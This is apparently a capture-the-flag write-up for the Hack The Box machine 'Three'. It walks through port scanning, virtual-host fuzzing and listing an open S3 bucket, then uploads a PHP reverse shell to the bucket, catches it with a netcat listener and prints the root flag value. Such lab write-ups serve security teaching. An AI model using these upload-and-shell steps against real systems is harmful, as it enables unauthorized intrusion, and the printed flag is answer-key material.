# HTB Three Walkthrough [Tier 1]: Learning AWS S3 Enumeration and Bucket Exploitation

## Initial Enumeration

We begin by scanning the target machine using Nmap to identify open ports and running services.

```bash
nmap -sV -sC 10.129.25.2
```

Output

```bash
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-25 03:50 EDT
Nmap scan report for 10.129.25.2
Host is up (0.28s latency).
Not shown: 998 closed tcp ports (reset)

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7
80/tcp open  http    Apache httpd 2.4.29
```

### Analysis

Two ports are exposed:

*   **22/tcp** running SSH
    
*   **80/tcp** running Apache HTTP Server
    

Since HTTP is accessible, web enumeration becomes the primary attack surface.

* * *

## Website Investigation

Opening the website reveals a simple landing page. Checking the **Contact** section exposes an email address containing the domain:

```text
thetoppers.htb
```

Since the domain does not resolve automatically, add it manually to `/etc/hosts`.

```bash
sudo nano /etc/hosts
```

Add:

```text
10.129.25.2 thetoppers.htb
```

This allows local hostname resolution.

* * *

## Virtual Host Enumeration

Subdomain enumeration is the next logical step.

We use FFUF to fuzz virtual hosts using the `Host` header.

```bash
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u "http://thetoppers.htb" \
-H "Host: FUZZ.thetoppers.htb" -fs 11952 -mc all
```

Output

```bash
s3                      [Status: 404, Size: 21]
gc._msdcs               [Status: 400, Size: 306]
```

Another method using Gobuster confirms the result.

```bash
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u http://thetoppers.htb --append-domain
```

Output

```bash
s3.thetoppers.htb Status: 404 [Size: 21]
gc._msdcs.thetoppers.htb Status: 400 [Size: 306]
```

The interesting subdomain discovered is:

```text
s3.thetoppers.htb
```

* * *

## Discovering Amazon S3

Visiting the subdomain shows behavior consistent with an Amazon S3 bucket.

This indicates the target may be exposing cloud storage functionality.

To interact with the service, install AWS CLI.

```bash
sudo apt install awscli
```

Configure AWS CLI:

```bash
aws configure
```

* * *

## Enumerating the S3 Bucket

List available buckets using:

```bash
aws s3 ls --endpoint-url http://s3.thetoppers.htb
```

Output

```bash
2025-08-25 03:49:04 thetoppers.htb
```

A bucket named `thetoppers.htb` is exposed.

Now enumerate bucket contents.

```bash
aws s3 ls --endpoint-url http://s3.thetoppers.htb s3://thetoppers.htb
```

Output

```bash
PRE images/
2025-08-25 03:49:04          0 .htaccess
2025-08-25 03:49:04      11952 index.php
```

The presence of `index.php` confirms the server executes PHP code.

This is highly significant because it opens the possibility of remote code execution through file upload.

* * *

## Gaining Remote Access

We can exploit the exposed S3 bucket by uploading a PHP reverse shell.

Download the PHP reverse shell from:

```text
https://github.com/pentestmonkey/php-reverse-shell
```

Save the file as:

```text
shell.php
```

Before uploading, modify the IP address and listening port inside the reverse shell script.

* * *

## Uploading the Reverse Shell

Upload the payload to the S3 bucket.

```bash
aws --endpoint-url http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb/
```

Output

```bash
upload: ./shell.php to s3://thetoppers.htb/shell.php
```

Now start a Netcat listener.

```bash
nc -lvnp 8080
```

Once the uploaded PHP file is accessed through the browser, a reverse shell connection is established.

### Listener Output

```bash
listening on [any] 8080 ...
connect to [10.10.14.122] from (UNKNOWN) [10.129.25.2] 33394
Linux three 4.15.0-189-generic x86_64
```

We now have remote shell access to the machine.

* * *

## Capturing the Flag

Search for the flag file.

```bash
find / -name flag.txt 2>/dev/null
```

Output

```bash
/root/flag.txt
```

Display the flag contents.

```bash
cat /root/flag.txt
```

### Root Flag :

```text
a980d99281a28d638ac68b9bf9453c2b
```

* * *

## Conclusion :

This machine demonstrates how dangerous exposed cloud storage can become when misconfigured.

Key concepts learned from this box:

*   Web enumeration
    
*   Virtual host fuzzing
    
*   AWS S3 bucket enumeration
    
*   AWS CLI usage
    
*   PHP reverse shell exploitation
    
*   Remote command execution
    

Three is an excellent beginner-friendly machine for understanding cloud-related attack surfaces in web applications.

* * *

## Tools Used -

| Tool | Purpose |
| --- | --- |
| Nmap | Port scanning and service enumeration |
| FFUF | Virtual host fuzzing |
| Gobuster | Subdomain enumeration |
| AWS CLI | Interacting with S3 buckets |
| Netcat | Reverse shell listener |
| PHP Reverse Shell | Remote code execution payload |

* * *
